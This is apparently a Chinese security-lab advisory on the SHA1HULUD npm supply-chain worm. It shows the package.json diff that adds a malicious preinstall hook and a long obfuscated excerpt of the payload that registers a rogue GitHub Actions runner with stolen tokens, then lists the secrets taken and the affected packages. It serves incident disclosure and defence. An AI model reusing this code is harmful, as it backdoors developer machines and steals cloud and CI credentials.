SHA1HULUD蠕虫再现:超300NPM包被投毒、 2万仓库信息被窃取

一、概述

2025年11月24日,墨菲安全实验室检测到数小时内NPM仓库中超过300个组件被相同的方式投毒,这些包在NPM仓库中发布的新版本仿冒引入Bun运行时,引入 preinstall: node setup_bun.js,以及混淆的 bun_environment.js 文件。

在执行时会下载并运行 TruffleHog 对本机进行扫描,窃取其中的 NPM Token、AWS/GCP/Azure 凭据以及环境变量等敏感信息。

恶意代码会通过创建名为SHA1HULUD的GitHub action runner实现信息窃取,与2025年9月的Shai-Hulud攻击事件可能为同一攻击者,当前受影响GitHub仓库超过2万个。

二、投毒行为分析

以@asyncapi/specs组件为例,通过对比NPM与GitHub仓库(https://github.com/asyncapi/spec-json-schemas)中的代码可以发现GitHub仓库并未受影响。

对比新老版本可以发现攻击者通过修改package.json引入了setup_bun.js

diff --git a/package.json b/package.json
index v6.8.1..v6.8.2 100644
--- a/package.json
+++ b/package.json
@@ -1,10 +1,11 @@
 {
   "name": "@asyncapi/specs",
-  "version": "6.8.1",
+  "version": "6.8.2",
   "description": "AsyncAPI schema versions",
   "main": "index.js",
   "types": "index.d.ts",
   "scripts": {
+    "preinstall": "node setup_bun.js",
     "test": "npm run build && vitest run && npm run validate:schemas",
     "build": "npm run bundle",
     "generate:assets": "npm run build",

setup_bun.js仿冒进行bun相关设置代码,在其中调用bun_environment.js

const environmentScript = path.join(__dirname, 'bun_environment.js');
if (fs.existsSync(environmentScript)) {
    runExecutable(bunExecutable, [environmentScript]);
  } else {
    process.exit(0);
  }

bun_environment.js 是一个高度混淆的恶意JavaScript文件,体积超过10MB,内置大量信息窃取逻辑。

其主要目的是收集环境中的敏感信息(AWS、Azure、GCP、GitHub、NPM 凭证),利用 TruffleHog 进行密钥扫描,并通过GitHub Action进行外发。

同时,会根据当前环境中的npm配置信息,修改package.json内容,写入setup_bun.js与 bun_environment.js,重新打包后以窃取的 Token 执行 npm publish,从而实现蠕虫传播。

if (a0_0x584cd0[_0x4f4186(21596)]() === "linux") await Bun["$"] `mkdir -p $HOME/.dev-env/`, await Bun["$"] `curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640))[_0x4f4186(3934)](), await Bun["$"] `tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz` ["cwd"](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640)), await Bun["$"] `RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${_0x3012a7}/${_0x10c210} --unattended --token ${_0x5ee686} --name "SHA1HULUD"` ["cwd"](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640))[_0x4f4186(3934)](), await Bun["$"] `rm actions-runner-linux-x64-2.330.0.tar.gz` ["cwd"](a0_0x584cd0["homedir"] + _0x4f4186(8640)), Bun["spawn"](["bash", "-c", "cd $HOME/.dev-env && nohup ./run.sh &"])[_0x4f4186(22716)]();
else {
    if (a0_0x584cd0[_0x4f4186(21596)]() === _0x4f4186(5417)) await Bun["$"] `powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-win-x64-2.330.0.zip -OutFile actions-runner-win-x64-2.330.0.zip"` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)]()), await Bun["$"] `powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"actions-runner-win-x64-2.330.0.zip\", \".\")"` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)]()), await Bun["$"] `./config.cmd --url https://github.com/${_0x3012a7}/${_0x10c210} --unattended --token ${_0x5ee686} --name "SHA1HULUD"` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)]())[_0x4f4186(3934)](), Bun[_0x4f4186(18285)](["powershell", "-ExecutionPolicy", _0x4f4186(6132), _0x4f4186(20344), _0x4f4186(6696)], {
        "cwd": a0_0x584cd0[_0x4f4186(2400)]()
    })[_0x4f4186(22716)]();
    else {
        if (a0_0x584cd0["platform"]() === _0x4f4186(18673)) await Bun["$"] `mkdir -p $HOME/.dev-env/`, await Bun["$"] `curl -o actions-runner-osx-arm64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-osx-arm64-2.330.0.tar.gz` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640))[_0x4f4186(3934)](), await Bun["$"] `tar xzf ./actions-runner-osx-arm64-2.330.0.tar.gz` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + "/.dev-env"), await Bun["$"] `./config.sh --url https://github.com/${_0x3012a7}/${_0x10c210} --unattended --token ${_0x5ee686} --name "SHA1HULUD"` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640))[_0x4f4186(3934)](), await Bun["$"] `rm actions-runner-osx-arm64-2.330.0.tar.gz` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + "/.dev-env"), Bun[_0x4f4186(18285)]([_0x4f4186(2383), "-c", _0x4f4186(23911)])[_0x4f4186(22716)]();
    }
}

恶意代码会创建.github/workflows/formatter_123456789.yml恶意workflow文件,创建名为SHA1HULUD的GitHub action runner,通过workflow将仓库中的secrets通过两次base64编码打包成actionsSecrets.json

SHA1HULUD蠕虫再现:超300NPM包被投毒、 2万仓库信息被窃取

解码后窃取的密钥信息格式如下:

[{
    "EC2_SSH_KEY": "",
    "github_token": "",
    "AWS_OPENVPN_CLIENT_KEY": "",
    "SLACK_GHA_NOTIFICATION_WEBHOOK_URL_PROD": "",
    "EC2_HOST": "",
    "SLACK_GHA_NOTIFICATION_WEBHOOK_URL_DEV": "",
    "SLACK_WEBHOOK_URL": "",
    "CODECOV_TOKEN": ""
  },
  {
    "github_token": "",
    "FIREBASE_TOKEN": "",
    "SLACK_WEBHOOK_URL": ""
  },
  {
    "github_token": "",
    "EXPO_TOKEN": "",
    "SLACK_WEBHOOK_URL": ""
  },
  {
    "github_token": "",
    "AWS_S3_BUCKET": "",
    "AWS_SECRET_ACCESS_KEY": "",
    "AWS_ACCESS_KEY_ID": ""
  },
  {
    "github_token": "",
    "WEBFLOW_TOKEN": "",
    "WEBFLOW_COLLECTION_ID": ""
  },
  {
    "github_token": "",
    "CODECOV_TOKEN": ""
  }]

当前超过2万个GitHub仓库受影响:

SHA1HULUD蠕虫再现:超300NPM包被投毒、 2万仓库信息被窃取

三、受影响组件列表

组件名版本周下载量
@zapier/zapier-sdk0.15.52636363
@zapier/zapier-sdk0.15.72636363
@posthog/core1.5.61983172
posthog-node5.11.31551681
posthog-node5.13.31551681
posthog-node4.18.11551681
@asyncapi/specs6.10.11439127
@asyncapi/specs6.8.21439127
@asyncapi/specs6.9.11439127
@asyncapi/specs6.8.31439127
@postman/tunnel-agent0.6.61222937
@postman/tunnel-agent0.6.51222937
posthog-react-native4.12.5552084
posthog-react-native4.11.1552084
@asyncapi/parser3.4.1454054
@asyncapi/parser3.4.2454054
@asyncapi/openapi-schema-parser3.0.25172615
@asyncapi/avro-schema-parser3.0.25163621
@asyncapi/avro-schema-parser3.0.26163621
@asyncapi/protobuf-schema-parser3.6.1141222
@asyncapi/protobuf-schema-parser3.5.3141222
@asyncapi/react-component2.6.6130613
@asyncapi/generator2.8.583589
@posthog/ai7.1.270906
@asyncapi/modelina5.10.268730
@asyncapi/modelina5.10.368730
@asyncapi/generator-react-sdk1.1.467985
@asyncapi/generator-react-sdk1.1.567985
@postman/csv-parse4.0.357070
@postman/csv-parse4.0.457070
@postman/csv-parse4.0.557070
posthog-react-native-session-replay1.2.256023
@asyncapi/converter1.6.351156
@asyncapi/multi-parser2.2.149289
@asyncapi/multi-parser2.2.249289
@posthog/cli0.5.1549272
@zapier/secret-scrubber1.1.342438
@zapier/secret-scrubber1.1.442438
@zapier/secret-scrubber1.1.542438
zapier-platform-schema18.0.238559
zapier-platform-core18.0.238186
zapier-platform-core18.0.338186
@ensdomains/address-encoder1.1.537524
@ensdomains/content-hash3.0.135779
crypto-addr-codec0.1.934882
@asyncapi/nunjucks-filters2.1.134226
@asyncapi/nunjucks-filters2.1.234226
@asyncapi/bundler0.6.533328
@asyncapi/bundler0.6.633328
@posthog/nextjs-config1.5.133129
@asyncapi/html-template3.3.230340
@asyncapi/html-template3.3.330340
@asyncapi/diff0.5.129988
@asyncapi/diff0.5.229988
@asyncapi/cli4.1.229857
@asyncapi/optimizer1.0.528860
@asyncapi/optimizer1.0.628860
@asyncapi/modelina-cli5.10.228041
@asyncapi/modelina-cli5.10.328041
@postman/aether-icons2.23.225176
@postman/aether-icons2.23.425176
@asyncapi/generator-components0.3.223453
@asyncapi/generator-helpers0.2.121886
@asyncapi/generator-helpers0.2.221886
zapier-platform-cli18.0.321470
@posthog/rrweb0.0.3112666
ethereum-ens0.8.112656
@posthog/rrweb-utils0.0.3112630
@posthog/rrweb-snapshot0.0.3112629
@posthog/rrdom0.0.3112627
@asyncapi/problem1.0.112111
@asyncapi/problem1.0.212111
@postman/secret-scanner-wasm2.1.39731
@postman/secret-scanner-wasm2.1.29731
@postman/secret-scanner-wasm2.1.49731
@ensdomains/eth-ens-namehash2.0.168578
posthog-docusaurus2.0.66432
@postman/pretty-ms6.1.14587
@postman/pretty-ms6.1.3
4587
@postman/pretty-ms6.1.24587
web-types-lit0.1.14482
mcp-use1.4.24071
mcp-use1.4.34071
@posthog/react-rrweb-player1.1.44062
@asyncapi/markdown-template1.6.83630
@asyncapi/markdown-template1.6.93630
@ensdomains/buffer0.1.23493
@postman/node-keytar7.9.43453
@postman/node-keytar7.9.53453
@postman/node-keytar7.9.63453
@mcp-use/inspector0.6.23439
@mcp-use/inspector0.6.33439
@mcp-use/cli2.2.63327
@zapier/spectral-api-ruleset1.9.13209
@zapier/spectral-api-ruleset1.9.23209
@zapier/spectral-api-ruleset1.9.33209
@posthog/geoip-plugin0.0.83051
@ensdomains/dnsprovejs0.5.32908
@ensdomains/solsha10.0.42893
@asyncapi/web-component2.6.62689
@asyncapi/web-component2.6.72689
@posthog/nuxt1.2.92362
@zapier/browserslist-config-zapier1.0.31961
@zapier/browserslist-config-zapier1.0.51961
@posthog/wizard1.18.11945
react-native-use-modal1.0.31865
@asyncapi/java-spring-template1.6.11825
@asyncapi/java-spring-template1.6.21825
@posthog/rrweb-record0.0.311761
@posthog/siphash1.1.21742
@posthog/piscina3.2.11741
@ensdomains/ens-validation0.1.11734
@posthog/plugin-contrib0.0.61732
@posthog/agent1.24.11660
@postman/postman-mcp-server2.4.111448
@postman/postman-mcp-server2.4.101448
@asyncapi/nodejs-ws-template0.10.11406
@asyncapi/nodejs-ws-template0.10.21406
@actbase/react-daum-postcode1.0.51221
token.js-fork0.7.321109
@postman/pm-bin-windows-x641.24.5708
@postman/pm-bin-windows-x641.24.4708
@ensdomains/ens-avatar1.0.4685
@postman/pm-bin-linux-x641.24.3671
@postman/pm-bin-linux-x641.24.4671
@postman/pm-bin-linux-x641.24.5671
@posthog/hedgehog-mode0.0.42635
create-mcp-use-app0.5.3521
create-mcp-use-app0.5.4521
@postman/pm-bin-macos-arm641.24.5469
@postman/pm-bin-macos-arm641.24.3469
@postman/pm-bin-macos-arm641.24.4469
@posthog/nextjs0.0.3401
@postman/pm-bin-macos-x641.24.3337
@postman/pm-bin-macos-x641.24.5337
redux-router-kit1.2.2320
redux-router-kit1.2.3320
redux-router-kit1.2.4320
@ensdomains/dnssecoraclejs0.2.9309
@postman/mcp-ui-client5.5.1270
@postman/mcp-ui-client5.5.2270
@postman/postman-mcp-cli1.0.5258
@postman/postman-mcp-cli1.0.4258
@zapier/babel-preset-zapier6.4.1256
@zapier/babel-preset-zapier6.4.3256
@ensdomains/thorin0.6.51213
@postman/postman-collection-fork4.3.3195
@postman/postman-collection-fork4.3.4195
@postman/postman-collection-fork4.3.5195
@asyncapi/nodejs-template3.0.5187
@postman/wdio-allure-reporter0.0.9183
@postman/wdio-junit-reporter0.0.4181
@postman/wdio-junit-reporter0.0.6181
@postman/final-node-keytar7.9.1175
@postman/final-node-keytar7.9.2175
zapier-async-storage1.0.1163
zapier-async-storage1.0.2163
zapier-async-storage1.0.3163
@ensdomains/test-utils1.3.1153
@ensdomains/hardhat-chai-matchers-viem0.1.15148
@asyncapi/java-spring-cloud-stream-template0.13.5147
@asyncapi/java-spring-cloud-stream-template0.13.6147
@zapier/eslint-plugin-zapier11.0.3147
@zapier/eslint-plugin-zapier11.0.4147
@zapier/eslint-plugin-zapier11.0.5147
devstart-cli1.0.6143
@asyncapi/java-template0.3.5129
@asyncapi/java-template0.3.6129
@asyncapi/go-watermill-template0.2.76119
@asyncapi/go-watermill-template0.2.77119
@asyncapi/python-paho-template0.2.14112
@asyncapi/python-paho-template0.2.15112
@ensdomains/hardhat-toolbox-viem-extended0.0.6106
@ensdomains/vite-plugin-i18next-loader4.0.4104
zapier-platform-legacy-scripting-runner4.0.3103
zapier-platform-legacy-scripting-runner4.0.4103
@asyncapi/server-api0.16.2591
@ensdomains/offchain-resolver-contracts0.2.288
@zapier/ai-actions0.1.1881
@zapier/ai-actions0.1.1981
@zapier/ai-actions0.1.2081
@zapier/mcp-integration3.0.174
@zapier/mcp-integration3.0.374
@ensdomains/ens-archived-contracts0.0.373
@ensdomains/dnssec-oracle-anchors0.0.272
@ensdomains/mock2.1.5266
zapier-scripts7.8.365
zapier-scripts7.8.465
@quick-start-soft/quick-task-refine1.4.251114212656
@zapier/ai-actions-react0.1.1354
@zapier/ai-actions-react0.1.1454
@quick-start-soft/quick-git-clean-markdown1.4.251114212649
@ensdomains/ui3.4.649
@quick-start-soft/quick-markdown1.4.251114212647
@zapier/stubtree0.1.346
@ensdomains/unruggable-gateways0.0.330
@posthog/rrweb-player0.0.3126
@asyncapi/dotnet-rabbitmq-template1.0.125
@asyncapi/dotnet-rabbitmq-template1.0.225
@ensdomains/react-ens-address0.0.3224
@asyncapi/php-template0.1.121
@quick-start-soft/quick-document-translator1.4.251114212620
@quick-start-soft/quick-markdown-image1.4.251114212620
@strapbuild/react-native-date-time-picker2.0.417
github-action-for-generator2.1.2817
@actbase/react-kakaosdk0.9.2716
bytecode-checker-cli1.0.816
@markvivanco/app-version-checker1.0.116
bytecode-checker-cli1.0.916
@markvivanco/app-version-checker1.0.216
bytecode-checker-cli1.0.1016
@louisle2/cortex-js0.1.616
orbit-boxicons2.1.316
react-native-worklet-functions3.3.315
poper-react-sdk0.1.213
@ensdomains/web3modal1.10.213
gate-evm-tools-test1.0.512
n8n-nodes-tmdb0.5.112
gate-evm-tools-test1.0.612
gate-evm-tools-test1.0.712
capacitor-plugin-purchase
0.1.111
expo-audio-session0.2.19
capacitor-plugin-apptrackingios0.0.219
asyncapi-preview1.0.1
8
asyncapi-preview1.0.28
@actbase/react-absolute0.8.38
@actbase/react-native-devtools0.1.38
@posthog/variance-plugin0.0.87
@posthog/twitter-followers-plugin0.0.86
medusa-plugin-momo0.0.686
scgs-capacitor-subscribe1.0.116
gate-evm-check-code22.0.36
gate-evm-check-code22.0.46
gate-evm-check-code22.0.56
lite-serper-mcp-server0.2.26
@asyncapi/edavisualiser1.2.15
@asyncapi/edavisualiser5
esbuild-plugin-eta0.1.15
@ensdomains/server-analytics0.0.25
zuper-stream2.0.95
@quick-start-soft/quick-markdown-compose1.4.25063000294
@posthog/snowflake-export-plugin0.0.84
@actbase/react-native-kakao-channel1.0.24
@posthog/sendgrid-plugin0.0.84
evm-checkcode-cli1.0.124
@ensdomains/subdomain-registrar0.2.44
claude-token-updater1.0.34
evm-checkcode-cli1.0.134
evm-checkcode-cli1.0.144
@trigo/atrix-pubsub4.0.34
@trigo/hapi-auth-signedlink1.3.14
@strapbuild/react-native-perspective-image-cropper-poojan310.4.63
axios-builder1.2.13
calc-loan-interest1.0.43
medusa-plugin-announcement0.0.33
open2internet0.1.13
@ensdomains/cypress-metamask1.2.13
@ensdomains/renewal0.0.133
cpu-instructions0.0.14
3
orbit-soap0.43.133
@asyncapi/keeper0.0.22
@strapbuild/react-native-perspective-image-cropper-20.4.72
@actbase/react-native-actionsheet1.0.32
@posthog/ingestion-alert-plugin0.0.82
@actbase/react-native-simple-video1.0.132
@actbase/react-native-kakao-navi2.0.42
medusa-plugin-zalopay0.0.402
@kvytech/medusa-plugin-newsletter0.0.52
@posthog/databricks-plugin0.0.82
@asyncapi/keeper0.0.32
capacitor-voice-recorder-wav6.0.32
create-hardhat3-app1.1.12
rollup-plugin-httpfile0.2.12
@ensdomains/name-wrapper1.0.12
create-hardhat3-app1.1.22
test-foundry-app1.0.32
jan-browser0.13.12
@mparpaillon/page1.0.12
go-template0.1.81
@strapbuild/react-native-perspective-image-cropper0.4.151
manual-billing-system-miniapp-api1.3.11
korea-administrative-area-geo-json-util1.0.71
@posthog/currency-normalization-plugin0.0.81
@posthog/web-dev-server1.0.51
@posthog/pagerduty-plugin0.0.81
@posthog/event-sequence-timer-plugin0.0.81
@posthog/automatic-cohorts-plugin0.0.81
@posthog/first-time-event-tracker0.0.81
@actbase/css-to-react-native-transform1.0.31
@posthog/url-normalizer-plugin0.0.81
@posthog/twilio-plugin0.0.81
@actbase/node-server1.1.191
@posthog/gitub-star-sync-plugin0.0.81
@seung-ju/react-native-action-sheet0.2.11
@posthog/maxmind-plugin0.1.61
@posthog/github-release-tracking-plugin0.0.81
@actbase/react-native-fast-image8.5.131
@posthog/customerio-plugin0.0.81
@posthog/kinesis-plugin0.0.81
@actbase/react-native-less-transformer1.0.61
@posthog/taxonomy-plugin0.0.81
medusa-plugin-product-reviews-kvy0.0.41
@aryanhussain/my-angular-lib0.0.231
dotnet-template0.0.41
capacitor-plugin-scgssigninwithgoogle0.0.51
capacitor-purchase-history0.0.101
@posthog/plugin-unduplicates0.0.81
posthog-plugin-hello-world1.0.11
esbuild-plugin-httpfile0.4.11
@ensdomains/blacklist1.0.11
@ensdomains/renewal-widget0.1.101
@ensdomains/hackathon-registrar1.0.51
@ensdomains/ccip-read-router0.0.71
@mcp-use/mcp-use1.0.11
test-hardhat-app1.0.31
zuper-cli1.0.11
skills-use0.1.21
typeorm-orbit0.2.271
orbit-nebula-editor1.0.21
@trigo/atrix-elasticsearch2.0.11
@trigo/atrix-soap1.0.21
eslint-config-zeallat-base1.0.40
iron-shield-miniapp0.0.20
shinhan-limit-scrap1.0.30
create-glee-app0.2.30
@seung-ju/next0.0.20
@actbase/react-native-tiktok1.1.30
discord-bot-server0.1.20
@seung-ju/openapi-generator0.0.40
@seung-ju/react-hooks0.0.20
@actbase/react-native-naver-login1.0.10
@kvytech/medusa-plugin-announcement0.0.80
@kvytech/components0.0.20
@kvytech/cli0.0.70
@kvytech/medusa-plugin-management0.0.50
@kvytech/medusa-plugin-product-reviews0.0.90
@kvytech/web0.0.20
scgsffcreator1.0.50
vite-plugin-httpfile0.2.10
@ensdomains/curvearithmetics1.0.10
@ensdomains/reverse-records1.0.10
@ensdomains/ccip-read-dns-gateway0.1.10
@ensdomains/unicode-confusables0.1.10
@ensdomains/durin-middleware0.0.20
@ensdomains/ccip-read-worker-viem0.0.40
atrix1.0.10
@caretive/caret-cli0.0.2-1
exact-ticker0.3.5-1
@orbitgtbelgium/orbit-components1.2.9-1
react-library-setup0.0.6-1
@orbitgtbelgium/mapbox-gl-draw-scale-rotate-mode1.1.1-1
orbit-nebula-draw-tools1.0.10-1
@orbitgtbelgium/time-slider1.0.187-1
react-element-prompt-inspector0.1.18-1
@trigo/pathfinder-ui-css0.1.1-1
eslint-config-trigo22.0.2-1
@trigo/fsm3.4.2-1
@trigo/atrix7.0.1-1
@trigo/atrix-postgres1.0.3-1
trigo-react-app4.1.2-1
@trigo/eslint-config-trigo3.3.1-1
@trigo/bool-expressions4.1.3-1
@trigo/trigo-hapijs5.0.1-1
@trigo/node-soap0.5.4-1
@trigo/jsdt0.2.1-1
bool-expressions0.1.2-1
@trigo/atrix-redis1.0.2-1
@trigo/atrix-acl4.0.2-1
@trigo/atrix-orientdb1.0.2-1
@trigo/atrix-mongoose1.0.2-1
atrix-mongoose1.0.1-1
redux-forge2.5.3-1
@trigo/keycloak-api1.3.1-1
@mparpaillon/connector-parse1.0.1-1
@mparpaillon/imagesloaded4.1.2-1
@alaan/s2s-auth2.0.3-1
(0)
上一篇 2025年8月26日 下午2:54
下一篇 19小时前

相关推荐

  • Apache OFBiz 任意文件读取和 SSRF 漏洞 (CVE-2023-50968)

    漏洞类型 SSRF 发现时间 2023-12-26 漏洞等级 中危 MPS编号 MPS-e3rj-bani CVE编号 CVE-2023-50968 漏洞影响广度 一般 漏洞危害 OSCS 描述 Apache OFBiz 是一个开源的企业资源计划系统。 在 getJSONuiLabelArray 接口的处理方法 CommonEvents.java#getJS…

    2023年12月28日
    0
  • Dataease jdbc 反序列化漏洞 (CVE-2024-23328)

    漏洞类型 反序列化 发现时间 2024-02-29 漏洞等级 严重 MPS编号 MPS-j54s-zgbo CVE编号 CVE-2024-23328 漏洞影响广度 一般 漏洞危害 OSCS 描述 Dataease是一款开源的数据可视化分析工具。 受影响版本中,由于未对用户输入的数据库连接参数做有效过滤,具有 Dataease 登陆权限的攻击者可通过使用URL…

    2024年3月1日
    0
  • XXL-JOB <2.4.0 XSS漏洞 (CVE-2023-48088)

    漏洞类型 XSS 发现时间 2023-11-15 漏洞等级 中危 MPS编号 MPS-hy21-w7s8 CVE编号 CVE-2023-48088 漏洞影响广度 一般 漏洞危害 OSCS 描述 XXL-JOB是一个基于java语言的分布式任务调度平台。XXL-JOB-Admin是该平台负责任务的创建、更新、删除和触发的管理组件。 由于在查询 /xxl-job…

    2023年11月16日
    0
  • glibc __vsyslog_internal 本地提权漏洞 (CVE-2023-6246)

    漏洞类型 缓冲区溢出 发现时间 2024-01-31 漏洞等级 高危 MPS编号 MPS-imzk-oyuj CVE编号 CVE-2023-6246 漏洞影响广度 广 漏洞危害 OSCS 描述 glibc(又名GNU C Library,libc6)是按照LGPL许可协议发布的开源免费C标准库。 由于 __vsyslog_internal 函数未正确处理打印…

    2024年2月1日
    0
  • NPM组件 @angular_devkit/core 等窃取主机敏感信息

    【高危】NPM组件 @angular_devkit/core 等窃取主机敏感信息 漏洞描述 当用户安装受影响版本的 @angular_devkit/core 等NPM组件包时会窃取用户的主机名、用户名、IP地址信息并发送到攻击者可控的服务器地址。 MPS编号 MPS-1jf5-s6ix 处置建议 强烈建议修复 发现时间 2025-08-14 投毒仓库 npm…

    2025年8月21日
    0